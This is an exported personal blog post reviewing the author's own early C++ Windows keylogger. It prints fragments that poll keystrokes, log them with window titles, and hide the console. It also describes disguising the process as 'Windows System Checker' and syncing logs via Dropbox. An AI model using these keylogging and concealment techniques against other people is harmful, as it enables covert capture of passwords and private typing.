{"id":228,"date":"2016-08-18T19:32:56","date_gmt":"2016-08-19T02:32:56","guid":{"rendered":"http:\/\/konukoii.com\/blog\/?p=228"},"modified":"2016-10-22T22:01:07","modified_gmt":"2016-10-23T05:01:07","slug":"capture-the-keys-chapter-1-clogger","status":"publish","type":"post","link":"https:\/\/konukoii.com\/blog\/2016\/08\/18\/capture-the-keys-chapter-1-clogger\/","title":{"rendered":"Capture the Keys - Chapter 1: Clogger"},"content":{"rendered":"<p>When I first arrived at UCSB, I realized that this was the first time I would be living with roommates (that weren't family). I had a Windows machine and I had recently learned how easy it was to break Windows passwords (in fact, I had just made some money helping some family friends recover some of their lost passwords). Thus, I was a bit worried about unwanted smart people rummaging through my computer. It occurred to me that this was a perfect excuse to build a simple keylogger. Besides, keyloggers had always fascinated me, simply because they were flashy and appeared in the news any time someone was talking about the dangers of computer hackers.<\/p>\n<p>My first intuition was that since C++ was so low-level (when compared to other languages), keylogging with it had to be\u00a0simple and efficient.\u00a0In a week or so, I whipped up a ~280-line program. Note that my keylogger relied on the windows.h and windowuser.h headers, because it was intended for use on my Windows machine.<\/p>\n<p>Now, after a few years have passed, I\u00a0wanted to do a small post-mortem of this code. 
<em><strong>Bear with me as we dive into some half-cooked old code!<\/strong><\/em><\/p>\n<p>In my <strong>main()<\/strong> I was initially using <strong>GetAsyncKeyState()<\/strong> from <strong>windows.h<\/strong> to check each key state, essentially polling all keys, which have virtual-key codes from 8 to 255. The line<strong> GetAsyncKeyState(i) == -32767<\/strong> is a bit hacky, but that is what this function returns if a key was just pressed and released. (<a href=\"http:\/\/www.cplusplus.com\/forum\/general\/141404\/\">Although apparently this isn't the best way to do it<\/a>.)<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nint i; \/\/ int, not unsigned char: an unsigned char can never exceed 255, so i &lt;= 255 would never be false\r\nwhile (true) { \/\/ tight polling loop that never yields the CPU\r\n    for (i = 8; i &lt;= 255; i++) {\r\n        if (GetAsyncKeyState(i) == -32767){\r\n            int a = log(i,&quot;LOG.txt&quot;);\r\n        }\r\n    }\r\n}\r\n<\/pre>\n<p>The log(key,file) function is where the magic happens: it takes a key that has been pressed, passes it through a filter function (explained later), figures out the focused window where the keypress was collected from, and saves all that info to the log file. 
Here is a shortened version of the log function that focuses on the important parts.<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nint log(int key,char* file){\r\n    fstream outFile(file,ios::out | ios::app);\r\n\r\n    \/\/etc, etc, etc ....\r\n    if (!isSameWindow()){\r\n        outFile &lt;&lt; &quot;\\n\\n *\/\\n\/*&quot; &lt;&lt; windowName &lt;&lt; endl;\r\n        outFile &lt;&lt; &quot;&gt;&gt;---------------------------------------\\n\\n&quot;;\r\n    }\r\n    savePrevWindow();\r\n\r\n    \/\/etc, etc, etc ....\r\n\r\n    key = filter(key);\r\n    print(key);\r\n    outFile &lt;&lt; (char) key;\r\n\r\n    outFile.close();\r\n    savePrevWindow();\r\n    return 0; \/\/ declared int, but the original never returned a value\r\n}\r\n<\/pre>\n<p>The filter(key) function simply checks if <strong>(Shift)<\/strong> or <strong>(Caps Lock)<\/strong>\u00a0are being pressed, and if so, it accounts for them. In other words, when you get a keypress for the <strong>(1)<\/strong> key, if <strong>(Shift)<\/strong>\u00a0is also being pressed, then the actual character that should be logged is\u00a0<strong>(!)<\/strong>.<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nif (hookShift()){\r\n    if (key == 186){key = ':';}\r\n    else if (key == 187){key = '+';}\r\n    \/\/...etc, etc, etc.\r\n}\r\n<\/pre>\n<p>To figure out which window is in the foreground (where the user is typing) we simply use <strong>GetWindowText()<\/strong> and <strong>GetForegroundWindow()<\/strong> from <strong>windowuser.h<\/strong>.<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nvoid savePrevWindow(){\r\n    HWND hwnd=GetForegroundWindow();\r\n    int test=GetWindowText(hwnd,prevWindow,80);\r\n}\r\n\r\nbool isSameWindow(){\r\n    HWND hwnd=GetForegroundWindow();\r\n    int test=GetWindowText(hwnd,windowName,80);\r\n    return strcmp(windowName,prevWindow) == 0;\r\n}\r\n<\/pre>\n<p>Last, but not least, we have a 
fancy-pants function to hide our keylogger from plain sight. Essentially it opens a hidden console and runs there. The only way the user will notice this is if they look into their Task Manager.<\/p>\n<pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\r\nvoid stealth(){\r\n    HWND stealth; \/\/Handle of the console window\r\n    AllocConsole(); \/\/Allocates a new console\r\n    stealth = FindWindowA(&quot;ConsoleWindowClass&quot;, NULL); \/\/Finds the window\r\n    MoveWindow(stealth,-300,-700,0,0,TRUE); \/\/Moves the window out of sight\r\n    ShowWindow(stealth,0); \/\/Hides the window\r\n    \/\/Not necessary. But feel free to play around with this:\r\n    \/\/SetPriorityClass(GetCurrentProcess(),HIGH_PRIORITY_CLASS);\r\n}\r\n<\/pre>\n<p>I compiled this code with g++ on Cygwin and called it something benign such as \"Windows System Checker\", so that even if someone opened the Task Manager, my keylogger would not arouse suspicion.<\/p>\n<p>Now, since the move-in date was approaching, I decided to forget about building an email module that would alert me and send log files when somebody was accessing my computer; instead I piggybacked on Dropbox, which I already had installed on my computer. So the program ran and saved files into Dropbox folders, which would automatically sync and thus alert me on my phone or other computers.<\/p>\n<p>I ran this keylogger for a while, but it did have one major drawback: CPU consumption. For some reason that is still rather unknown to me, it takes up to 50% CPU usage. 
That is insane, and honestly quite ridiculous for any self-respecting keylogger.<\/p>\n<p>Seeing this, I decided to abandon my C++ prototype and try something different.<\/p>\n<p>I decided to try Python...<\/p>\n<p><a href=\"http:\/\/konukoii.com\/blog\/2016\/09\/27\/capture-the-keys-chapter-2-pylogger\/\">[Continue to \"Capture the Keys - Chapter 2: Pylogger\"]<\/a><\/p>\n<h4>Complete Code<\/h4>\n<p><script src=\"https:\/\/gist.github.com\/pmsosa\/41f1f049c8b63d4168501d40ec53b639.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>When I first arrived at UCSB, I realized that this was the first time I&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/konukoii.com\/blog\/2016\/08\/18\/capture-the-keys-chapter-1-clogger\/\">Read the post<span class=\"screen-reader-text\">Capture the Keys - Chapter 1: Clogger<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":236,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,32],"tags":[55,54,53,56],"class_list":["post-228","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-compsec","category-tutorials","tag-c","tag-hacking","tag-keylogging","tag-software","excerpt","zoom","full-without-featured","even","excerpt-0"],"_links":{"self":[{"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/posts\/228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/comments?post=228"}],"version-history":[{"count":10,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/posts\/228\/revisions"}],"predecessor-version":[{"id":342,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/posts\/228\/revisions\/342"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/media\/236"}],"wp:attachment":[{"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/media?parent=228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/categories?post=228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/konukoii.com\/blog\/wp-json\/wp\/v2\/tags?post=228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}